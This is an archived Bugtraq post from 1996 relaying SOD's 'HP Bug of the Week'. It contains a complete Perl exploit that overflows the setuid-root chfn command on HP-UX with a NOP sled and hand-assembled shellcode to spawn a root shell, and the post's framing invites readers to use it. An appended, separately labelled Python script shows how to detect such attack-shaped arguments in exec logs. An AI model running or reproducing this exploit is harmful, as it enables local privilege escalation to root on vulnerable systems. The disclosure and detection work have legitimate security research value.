Bugtraq mailing list archives

the HP Bug of the Week!


From: aleph1 () dfw net (Aleph One)
Date: Mon, 9 Dec 1996 02:47:46 -0600


From our friends at SOD:

   This week: the continuing saga of buffer overflows in setuid root
   programs


   Amid the struggle of the terrible workaday week, among the lost
   broken-hearted keypunching drones, alongside the workers in the
   dreaded server farm, Our Hero bravely sends the legally forbidden
   datastream across the burning wires toward a cold and lifeless shell
   of a shell. The electrons twist! The binary bits battle! The data bus
   swerves sharply to avoid hitting the eclectic keywords! Was the script
   executed in time to save Our Hero and his lovely Mistress? Were the
   exploitable programs still enabled setuid root? Will the buffers spill
   onto the stack and leave way to run a small semblance of illicit code?
   Of course they will, and you don't have to tune in next week to find
   out, either. This week, the chfn command happily runs some code for us
   as root, and Otto Sync joins us as an honorary Scriptor with his
   exploits written especially for HP's OpenCall Service Control Point
   platform for SS7 telephony use -- oh, I don't know how well Alcatel is
   going to like this one! So snarf it, pop it open, and suck it down,
   and as always remember to start clicking your way to root access with
   scripts from those Superhero kind of folks at SOD.

     _________________________________________________________________

Caveat Emptor

   of.chfn: changes uid's, too! (script for this week)
     _________________________________________________________________
#!/usr/bin/perl

use FileHandle;

sub h2cs {
  local($stuff)=@_;
  local($rv);
  while($stuff !~ /^$/) {
    $bob=$stuff;
    $bob =~ s/^(..).*$/$1/;
    $stuff =~ s/^..//;
    $rv.=chr(oct("0x${bob}"));
    }
  return $rv;
  }

open(PIPE,"uname -r|");
chop($rev=<PIPE>);
close(PIPE);
$rev =~ s/^.*\.(.*)\..*$/$1/;

if ($rev eq "10") {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b03A013");
  } else {
  $offset=2070;
  $prealign="AA";
  $postalign="PPPP";
  $pcoq=h2cs("7b033013");
  }

$nop=h2cs("08210280");
$code="";
$code.=h2cs("34160506"); # LDI 643,r22
$code.=h2cs("96d60534"); # SUBI 666,r22,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("0b5a029a"); # XOR arg0,arg0,arg0
$code.=h2cs("e83f1ffd"); # BL .+8,r1
$code.=h2cs("08210280"); # NOP
$code.=h2cs("34020102"); # LDI 129,rp
$code.=h2cs("08410402"); # SUB r1,rp,rp
$code.=h2cs("60400162"); # STB r0,177(rp)
$code.=h2cs("b45a0154"); # ADDI 170,rp,arg0
$code.=h2cs("0b390299"); # XOR arg0,arg0,arg0
$code.=h2cs("0b180298"); # XOR arg0,arg0,arg0
$code.=h2cs("341604be"); # LDI 607,r22
$code.=h2cs("20200801"); # LDIL L%0xc0000004,r1
$code.=h2cs("e420e008"); # BLE 4(sr7,r1)
$code.=h2cs("96d60534"); # SUB 666,r22,r22
$code.=h2cs("deadcafe"); # Illegal instruction -- dump core if exec fails
$data="/bin/sh."; # Data stuff

$codedata=$code.$data;
$num=int(($offset-length($code)-length($data)-4)/4);
$pre="$nop"x$num;
$of=$prealign;
$of.=$pre.$code.$data.$postalign.$pcoq;
exec("/usr/bin/chfn","$of");
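The script above hands chfn a single argument of roughly two kilobytes: a short
alignment prefix, a long run of one repeated four-byte NOP, a few dozen bytes of
machine code, the string "/bin/sh." and a return address. From the defender's
side, that shape is easy to spot in process-execution audit data. The following
is an added example, written for this archive page and not part of the original
post or of SOD's script. It assumes a constructed one-line-per-exec log format
("<timestamp> uid=<n> exe=<path> argv=<hex bytes>"); the watch list, the
length and byte-ratio thresholds and the sample records are assumptions chosen
to match the attack shape the page shows, and would be tuned per site.

```python
"""Flag attack-shaped arguments passed to setuid-root account utilities.

Added example (not from the Bugtraq post or SOD). Log format, watch list and
thresholds are constructed assumptions, not any real audit subsystem's output.
"""
import re

# Assumption: setuid-root binaries worth watching on this host.
SETUID_WATCHLIST = {"/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/passwd"}
MAX_SANE_ARG_LEN = 256          # a GECOS field or shell path is far shorter than this
MAX_NONPRINTABLE_RATIO = 0.10   # legitimate arguments are text
MIN_REPEATED_WORD_RUN = 16      # one 4-byte word repeated this often looks like a NOP sled

# Constructed record format: "<ts> uid=<n> exe=<path> argv=<hex-encoded bytes>"
RECORD_RE = re.compile(
    r'^(?P<ts>\S+) uid=(?P<uid>\d+) exe=(?P<exe>\S+) argv=(?P<argv>[0-9a-fA-F]*)$')


def parse_record(line):
    """Return a dict for a well-formed record, or None for anything else."""
    m = RECORD_RE.match(line.strip())
    if not m:
        return None
    return {"ts": m["ts"], "uid": int(m["uid"]),
            "exe": m["exe"], "argv": bytes.fromhex(m["argv"])}


def longest_repeated_word_run(data):
    """Longest run of an identical, 4-byte-aligned word: the fingerprint of a sled."""
    best = run = 0
    prev = None
    for i in range(0, len(data) - 3, 4):
        word = data[i:i + 4]
        run = run + 1 if word == prev else 1
        best = max(best, run)
        prev = word
    return best


def assess(record):
    """List the reasons a record looks like an overflow attempt (empty if benign)."""
    reasons = []
    if record["exe"] not in SETUID_WATCHLIST:
        return reasons
    arg = record["argv"]
    if len(arg) > MAX_SANE_ARG_LEN:
        reasons.append(f"argument length {len(arg)} exceeds {MAX_SANE_ARG_LEN}")
    if arg:
        nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7e)
        ratio = nonprint / len(arg)
        if ratio > MAX_NONPRINTABLE_RATIO:
            reasons.append(f"{ratio:.0%} non-printable bytes")
    run = longest_repeated_word_run(arg)
    if run >= MIN_REPEATED_WORD_RUN:
        reasons.append(f"4-byte word repeated {run} times (sled-like)")
    if b"/bin/sh" in arg:
        reasons.append("embedded shell path")
    return reasons


def scan(lines):
    """Return (ts, uid, exe, reasons) for every record that trips a rule."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        reasons = assess(rec)
        if reasons:
            alerts.append((rec["ts"], rec["uid"], rec["exe"], reasons))
    return alerts


# Constructed sample log: two benign records, one attack-shaped record, one bad line.
SAMPLE_LOG = [
    # a user editing their own GECOS field
    "1996-12-09T02:47:46 uid=1001 uid=1001 exe=/usr/bin/chfn argv=".replace(" uid=1001", "", 1)
    + b"Alice Liddell".hex(),
    # long argument to a binary that is not setuid root: not our concern here
    "1996-12-09T02:48:01 uid=1001 exe=/bin/ls argv=" + (b"/tmp/" + b"x" * 300).hex(),
    # sled of one repeated word, a binary tail, a shell path and a return-address pad
    "1996-12-09T02:48:30 uid=1001 exe=/usr/bin/chfn argv="
    + (b"AA" + bytes.fromhex("08210280") * 500 + b"\xde\xad\xca\xfe"
       + b"/bin/sh." + b"PPPP").hex(),
    "garbage line that does not parse",
]

if __name__ == "__main__":
    for ts, uid, exe, reasons in scan(SAMPLE_LOG):
        print(f"{ts} uid={uid} {exe}: " + "; ".join(reasons))
```

The rules are deliberately independent: an over-long argument alone is worth a
look, but the combination of a sled-like repeated word, a high share of
non-printable bytes and an embedded shell path on a setuid-root binary is what
separates the record from an ordinary typo or a pasted paragraph. The cheaper
mitigation the post itself alludes to is to not leave such programs setuid root
at all where they are not needed.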


Aleph One / aleph1 () dfw net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
